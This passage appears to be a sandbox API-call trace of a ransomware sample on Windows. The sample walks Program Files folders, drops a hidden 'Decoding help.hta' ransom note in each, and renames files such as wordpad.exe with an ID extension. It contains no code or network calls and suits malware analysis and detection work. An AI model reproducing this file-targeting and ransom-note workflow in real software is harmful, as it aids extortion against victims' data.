-1 [0041.512] lstrcmpW (lpString1="..", lpString2="Weather.Gadget") returned -1 [0041.512] lstrcmpiW (lpString1="windows", lpString2="Weather.Gadget") returned 1 [0041.515] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.515] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="Weather.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget" [0041.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\*.*" [0041.515] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e10a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.516] CloseHandle (hObject=0x350) returned 1 [0041.516] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 0 [0041.516] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 264 os_tid = 0x9bc [0040.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Visualizations\\*.*", lpFindFileData=0x137dfd30 | out: lpFindFileData=0x137dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0041.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.501] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x137dfd30 | out: lpFindFileData=0x137dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.501] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.501] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x137dfd30 | out: lpFindFileData=0x137dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80020c30, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80020c30, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0041.501] FindClose (in: hFindFile=0x5a5770 | out: hFindFile=0x5a5770) returned 1 Thread: id = 265 os_tid = 0x904 [0040.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*", lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7ed0 [0040.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.647] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.647] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.647] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 1 [0040.647] lstrcmpW (lpString1=".", lpString2="Windows Workflow Foundation") returned -1 [0040.647] lstrcmpW (lpString1="..", lpString2="Windows Workflow Foundation") returned -1 [0040.647] lstrcmpiW (lpString1="windows", lpString2="Windows Workflow Foundation") returned -1 [0040.649] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*" [0040.649] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*") returned 48 [0040.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\", lpString2="Windows Workflow Foundation" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation" [0040.649] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\*.*" [0040.649] GlobalMemoryStatus (in: lpBuffer=0x8f4fd10 | out: lpBuffer=0x8f4fd10) [0040.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1115bbb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0040.650] CloseHandle (hObject=0x2f8) returned 1 [0040.650] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x8f4fd30 | out: lpFindFileData=0x8f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0040.650] FindClose (in: hFindFile=0x5d7ed0 | out: hFindFile=0x5d7ed0) returned 1 Thread: id = 266 os_tid = 0x910 [0040.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*", lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8190 [0040.879] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.879] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.880] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.880] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.880] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0040.880] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0040.880] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0040.880] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0041.296] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0041.296] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned 53 [0041.296] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US" [0041.296] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\en-US\\*.*" [0041.296] GlobalMemoryStatus (in: lpBuffer=0x91cfd10 | out: lpBuffer=0x91cfd10) [0041.296] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109a0938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0041.302] CloseHandle (hObject=0x18c) returned 1 [0041.302] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8513b27, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa8513b27, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa8585f48, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x40ce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wordpad.exe", cAlternateFileName="")) returned 1 [0041.302] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0041.302] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned 53 [0041.302] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta" [0041.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\decoding help.hta")) returned 0xffffffff [0041.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0041.302] WriteFile (in: hFile=0x18c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x91cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x91cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.303] CloseHandle (hObject=0x18c) returned 1 [0041.306] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.306] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wordpad.exe") returned -1 [0041.306] lstrlenW (lpString="wordpad.exe") returned 11 [0041.306] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0041.306] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned 53 [0041.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\", lpString2="wordpad.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" [0041.306] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" [0041.306] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0041.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\wordpad.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpad.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.312] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe46e7c7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xbe46e7c7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1b193f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 1 [0041.313] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0041.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned 53 [0041.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta" [0041.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\decoding help.hta")) returned 0x1 [0041.313] lstrcmpiW (lpString1="Decoding help.hta", lpString2="WordpadFilter.dll") returned -1 [0041.313] lstrlenW (lpString="WordpadFilter.dll") returned 17 [0041.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*" [0041.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\*.*") returned 53 [0041.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\", lpString2="WordpadFilter.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" [0041.313] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" [0041.313] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0041.313] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\Accessories\\WordpadFilter.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\accessories\\wordpadfilter.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.313] FindNextFileW (in: hFindFile=0x5d8190, lpFindFileData=0x91cfd30 | out: lpFindFileData=0x91cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe46e7c7, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xbe46e7c7, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xb1b193f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x2f800, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordpadFilter.dll", cAlternateFileName="")) returned 0 [0041.313] FindClose (in: hFindFile=0x5d8190 | out: hFindFile=0x5d8190) returned 1 Thread: id = 267 os_tid = 0x9d4 [0040.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*", lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7ed0 [0040.699] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.699] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.699] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.699] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 1 [0040.699] lstrcmpW (lpString1=".", lpString2="Framework") returned -1 [0040.699] lstrcmpW (lpString1="..", lpString2="Framework") returned -1 [0040.699] lstrcmpiW (lpString1="windows", lpString2="Framework") returned 1 [0040.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*" [0040.699] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*") returned 61 [0040.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\", lpString2="Framework" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework" [0040.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\*.*" [0040.699] GlobalMemoryStatus (in: lpBuffer=0x9c4fd10 | out: lpBuffer=0x9c4fd10) [0040.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f48f50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0040.700] CloseHandle (hObject=0x2f8) returned 1 [0040.700] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0x9c4fd30 | out: lpFindFileData=0x9c4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 0 [0040.700] FindClose (in: hFindFile=0x5d7ed0 | out: hFindFile=0x5d7ed0) returned 1 Thread: id = 268 os_tid = 0x3ac [0040.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*", lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7ed0 [0040.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.702] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22b43298, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.702] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.702] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0040.702] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*" [0040.702] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\*.*") returned 